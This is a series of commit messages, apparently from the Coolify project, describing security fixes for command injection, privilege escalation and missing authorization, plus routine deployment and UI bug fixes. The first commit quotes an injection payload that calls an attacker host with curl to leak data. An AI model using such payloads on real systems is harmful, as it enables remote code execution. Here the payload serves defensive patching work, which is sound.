**Security Fix: Command Injection Vulnerability**
This commit addresses a critical command injection vulnerability in the
`generateGitLsRemoteCommands` method that could allow low-privileged users
(team members) to execute arbitrary commands as root on the Coolify instance.
**Vulnerability Details:**
- Affected deployment types: `deploy_key` and `source` (GithubApp)
- Attack vector: Malicious git repository URLs containing shell metacharacters
- Impact: Remote code execution as root
- Example payload: `repo.git';curl attacker.com/$(whoami)`
**Changes Made:**
1. **deploy_key deployment type** (Application.php:1111-1112):
- Added proper escaping for `$customRepository` in git ls-remote commands
- Uses `str_replace("'", "'\\''", ...)` to escape single quotes for bash -c context
- Wraps repository URL in single quotes to prevent interpretation of shell metacharacters
2. **source deployment type with GithubApp** (Application.php:1067-1086):
- Added `escapeshellarg()` for all repository URL variations
- Covers both public and private repositories
- Handles both Docker and non-Docker execution contexts
3. **Added comprehensive unit tests** (tests/Unit/ApplicationGitSecurityTest.php):
- Tests for deploy_key type command injection prevention
- Tests for source type with public repos
- Tests for other type (already fixed in previous commit)
- Validates that malicious payloads are properly escaped
**Note:** The `other` deployment type was already fixed in commit b81baff4b.
This commit completes the security fix for all deployment types.
**Technical Details:**
The fix accounts for the `executeInDocker()` wrapper which uses `bash -c '...'`.
When commands are executed inside `bash -c` with single quotes, we must escape
single quotes as `'\''` to prevent the quotes from closing prematurely and
allowing shell injection.
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude <noreply@anthropic.com>
Previously, the bash escaping functions (`escapeBashEnvValue()` and `escapeBashDoubleQuoted()`) had strict string type hints that rejected null values, causing deployment failures when environment variables had null values.
Changes:
- Updated both functions to accept nullable strings (`?string $value`)
- Handle null/empty values by returning empty quoted strings (`''` for single quotes, `""` for double quotes)
- Added 3 new tests to cover null and empty value handling
- All 29 tests pass
This fix ensures deployments work correctly even when environment variables have null values, while maintaining the existing behavior for all other cases.
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude <noreply@anthropic.com>
This commit addresses a critical security vulnerability where low-privileged
users (members) could invite high-privileged users (admins/owners) to teams,
allowing them to escalate their own privileges through password reset.
Root Causes Fixed:
1. TeamPolicy authorization checks were commented out, allowing all team
members to manage invitations instead of just admins/owners
2. Missing role elevation checks in InviteLink component allowed members
to invite users with higher privileges
Security Fixes:
1. app/Policies/TeamPolicy.php
- Uncommented and enforced authorization checks for:
* update() - Only admins/owners can update team settings
* delete() - Only admins/owners can delete teams
* manageMembers() - Only admins/owners can manage team members
* viewAdmin() - Only admins/owners can view admin panel
* manageInvitations() - Only admins/owners can manage invitations
2. app/Livewire/Team/InviteLink.php
- Added explicit role elevation checks to prevent:
* Members from inviting admins or owners
* Admins from inviting owners (defense-in-depth)
- Validates that inviter has sufficient privileges for target role
Test Coverage:
1. tests/Feature/TeamPolicyTest.php
- 24 comprehensive tests covering all policy methods
- Tests for owner, admin, member, and non-member access
- Specific tests for the privilege escalation vulnerability
2. tests/Feature/TeamInvitationPrivilegeEscalationTest.php
- 11 tests covering all role elevation scenarios
- Tests member → admin/owner escalation (blocked)
- Tests admin → owner escalation (blocked)
- Tests valid invitation paths for each role
Impact:
- Prevents privilege escalation attacks
- Protects all Coolify instances from unauthorized access
- Enforces proper role hierarchy in team management
References:
- Identified by Aikido AI whitebox pentest service
- CVE: Pending assignment
- Severity: Critical
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude <noreply@anthropic.com>
Add environment variables for SMTP host, port, username, password, email, and sender name to enable email functionality in the museum service. This enhances the ente-photos setup with email capabilities for notifications or other features.
Fixed three issues preventing the "new image" quick action from working:
1. Frontend matching logic wasn't checking the quickcommand field
- Added check for item.quickcommand in the matching logic
- Now "new image" matches docker-image via its quickcommand "(type: new image)"
2. Search query remained populated after triggering selection flow
- Clear searchQuery in navigateToResourceCreation() to show selection UI
- This switches the UI from creatable items list to server selection
3. Redirect wasn't using Livewire's redirect method
- Changed from redirect()->route() to $this->redirect(route())
- Ensures proper Livewire component redirect behavior
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude <noreply@anthropic.com>
- Replace manual regex parsing with DockerImageParser in ApplicationsController
- Fix double-decoration bug where image names like nginx@sha256:hash would
become nginx:hash@sha256 causing malformed references
- Add auto-parse feature in Livewire DockerImage component
- Users can now paste complete references like nginx:stable@sha256:abc123...
and fields auto-populate
- Update UI placeholder with examples: nginx, docker.io/nginx:latest,
ghcr.io/user/app:v1.2.3, nginx:stable@sha256:abc123...
- Add comprehensive unit tests for auto-parse functionality
- All tests passing (20 tests, 73 assertions)
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude <noreply@anthropic.com>
The code was computing $imageTag with the 'sha256-' prefix for digest-based
images but then using $parser->getTag() directly when creating the Application,
which bypassed the prefix logic entirely.
This fix ensures that digest-based Docker images preserve their 'sha256-' prefix
by using the computed $imageTag variable instead of calling $parser->getTag()
directly.
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude <noreply@anthropic.com>
Two improvements to Git deployment handling:
1. **ApplicationDeploymentJob.php**:
- Fixed log message to show actual resolved commit SHA (`$this->commit`)
- Previously showed `$this->application->git_commit_sha` which could be "HEAD"
- Now displays the actual 40-character commit SHA that will be deployed
2. **Application.php (generateGitLsRemoteCommands)**:
- Added `escapeshellarg()` for repository URL in 'other' deployment type
- Prevents shell injection in git ls-remote commands
- Complements existing shell escaping in `generateGitImportCommands`
- Ensures consistent security across all Git operations
**Security Impact:**
- All Git commands now use properly escaped repository URLs
- Prevents command injection through malicious repository URLs
- Consistent escaping in both ls-remote and clone operations
**User Experience:**
- Deployment logs now show exact commit SHA being deployed
- More accurate debugging information for deployment issues
Co-Authored-By: Claude <noreply@anthropic.com>
Fixes pure Dockerfile deployment failing with 'env file not found' error.
The deploy_simple_dockerfile() method was missing the call to
save_runtime_environment_variables() which creates the .env file
needed during the rolling update phase. This call is present in
all other deployment methods (dockerfile, dockercompose, nixpacks,
static) but was missing here.
This ensures the .env file exists when docker compose tries to
use --env-file during the rolling update.
Enhanced test coverage to match production code regex pattern and prevent
false positives by adding comprehensive edge case testing.
**Changes:**
1. **Updated regex pattern to match production code**:
- Changed from `/([0-9a-f]{40})\s*\t/` to `/\b([0-9a-fA-F]{40})(?=\s*\t)/`
- Now handles both uppercase and lowercase hex characters (A-F and a-f)
- Uses word boundary `\b` for more precise matching
- Uses lookahead `(?=\s*\t)` instead of capturing whitespace
2. **Added uppercase SHA test**:
- Tests extraction of uppercase commit SHA (196D3DF7...)
- Normalizes to lowercase using `strtolower()` for comparison
- Reflects Git's case-insensitive SHA handling
3. **Added negative test cases**:
- Tests output with no commit SHA present (error messages only)
- Tests output with tab but invalid SHA format
- Ensures `null` is returned to prevent false positives
**Test Coverage:**
- 8 total tests (up from 5)
- Covers all positive cases (lowercase, uppercase, warnings, whitespace)
- Covers negative cases (missing SHA, invalid format)
- Regex pattern now exactly matches production code in ApplicationDeploymentJob.php:1908
Co-Authored-By: Claude <noreply@anthropic.com>
Added authorization checks to 11 database-related Livewire components
that were loading sensitive database configuration without verifying
user permissions.
Changes:
- Added authorize('view', $database) to all 8 database type General.php mount() methods
- Added authorization to Configuration.php before loading database
- Added authorization to BackupEdit.php before loading backup config
- Added authorization to Import.php before loading database resource
This prevents unauthorized users from accessing database credentials,
connection strings, and configuration details.
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude <noreply@anthropic.com>
- Strip leading slashes from publish_directory to prevent /app// paths
- Only add slash prefix if directory is not empty
- Ensures clean Docker COPY paths in build output
Nullable server + guard to avoid TypeError/NPE. Don't terminate the app, terminate the bug.
Changes:
- Made Server property nullable (?Server $server = null) in all 8 database General components
- Added guard clause in mount() to check for null server before accessing it
- Displays user-friendly error message when destination server is not configured
- Prevents crashes in methods like isLogDrainEnabled() and sslCertificates()
Fixed components:
- Mariadb, Dragonfly, Clickhouse, Keydb
- Mysql, Mongodb, Redis, Postgresql
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude <noreply@anthropic.com>
Fixes deployment failures when Git repositories redirect (e.g., tangled.sh → tangled.org)
and improves security by adding proper shell escaping for repository URLs.
**Root Cause:**
Git redirect warnings can appear on the same line as ls-remote output with no newline:
`warning: redirecting to https://tangled.org/...196d3df... refs/heads/master`
The previous parsing logic split by newlines and extracted text before tabs, which
included the entire warning message instead of just the 40-character commit SHA.
**Changes:**
1. **Fixed commit SHA extraction** (ApplicationDeploymentJob.php):
- Changed from line-based parsing to regex pattern matching
- Uses `/([0-9a-f]{40})\s*\t/` to find valid 40-char hex commit SHA before tab
- Handles warnings on same line, separate lines, multiple warnings, and whitespace
- Added comprehensive Ray debug logs for troubleshooting
2. **Added security fix** (Application.php):
- Added `escapeshellarg()` for repository URLs in 'other' deployment type
- Prevents shell injection and fixes parsing issues with special characters like `@`
- Added Ray debug logs for deployment type tracking
3. **Comprehensive test coverage** (GitLsRemoteParsingTest.php):
- Tests normal output without warnings
- Tests redirect warning on separate line
- Tests redirect warning on same line (actual tangled.sh format)
- Tests multiple warning lines
- Tests extra whitespace handling
**Resolves:**
- Linear issue COOLGH-53: Valid git URLs are rejected as being invalid
- GitHub issue #6568: tangled.sh deployments failing
- Handles Git redirects universally for all Git hosting services
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude <noreply@anthropic.com>
- Add support for QUEUED, KILLED, and CANCELLED statuses
- Replace if-elseif chain with match expression for better exhaustiveness
- Add appropriate emoji indicators for each status
- Ensure all ProcessStatus enum values are handled
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude <noreply@anthropic.com>
**Problem:**
Monaco editor was receiving unique HTML IDs (e.g., "customLabels-a09a7773")
and using them in @entangle(), causing errors:
"Livewire property ['customLabels-a09a7773'] cannot be found"
**Root Cause:**
Monaco editor template uses @entangle($id) to bind to Livewire properties.
After our unique ID fix, $id contained the unique HTML ID with suffix,
not the original property name.
**Solution:**
Pass $modelBinding (original property name) instead of $htmlId to Monaco
editor component. This ensures @entangle() uses the correct property name
while HTML elements still get unique IDs.
**Result:**
✅ Monaco editor @entangle works correctly
✅ HTML IDs remain unique
✅ No Livewire property errors
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude <noreply@anthropic.com>
**Problems Fixed:**
1. Livewire warnings about non-existent properties (e.g., wire:model="dcgoowgw0gcgcsgg00c8kskc")
2. Duplicate HTML IDs still appearing despite initial fix
**Root Causes:**
1. Auto-generated Cuid2 IDs were being used for wire:model when no explicit id was provided
2. Livewire's wire:id attribute isn't available during server-side rendering
**Solutions:**
1. Set $modelBinding to 'null' (string) when id is not provided, preventing invalid wire:model generation
2. Use random MD5 suffix instead of Livewire component ID for guaranteed uniqueness during initial render
3. Maintain correct $name attribute based on original property name
**Technical Changes:**
- Input, Textarea, Select, Datalist: Use random 8-char suffix for uniqueness
- Checkbox: Apply same random suffix approach
- wire:model now only created for explicit property names
- HTML IDs are unique from initial server render (no hydration required)
**Result:**
✅ No more Livewire property warnings
✅ Truly unique HTML IDs across all components
✅ wire:model bindings work correctly
✅ Validation and form submission unaffected
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude <noreply@anthropic.com>
Resolve browser console warnings about non-unique HTML IDs when multiple
Livewire components with similar form fields appear on the same page.
**Problem:**
Multiple forms using generic IDs like `id="description"` or `id="name"`
caused duplicate ID warnings and potential accessibility/JavaScript issues.
**Solution:**
- Separate `wire:model` binding name from HTML `id` attribute
- Auto-prefix HTML IDs with Livewire component ID for uniqueness
- Preserve existing `wire:model` behavior with property names
**Implementation:**
- Added `$modelBinding` property for wire:model (e.g., "description")
- Added `$htmlId` property for unique HTML ID (e.g., "lw-xyz123-description")
- Updated render() method to generate unique IDs automatically
- Updated all blade templates to use new properties
**Components Updated:**
- Input (text, password, etc.)
- Textarea (including Monaco editor)
- Select
- Checkbox
- Datalist (single & multiple selection)
**Result:**
✅ All HTML IDs now unique across page
✅ No console warnings
✅ wire:model bindings work correctly
✅ Validation error messages display correctly
✅ Backward compatible - no changes needed in existing components
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude <noreply@anthropic.com>
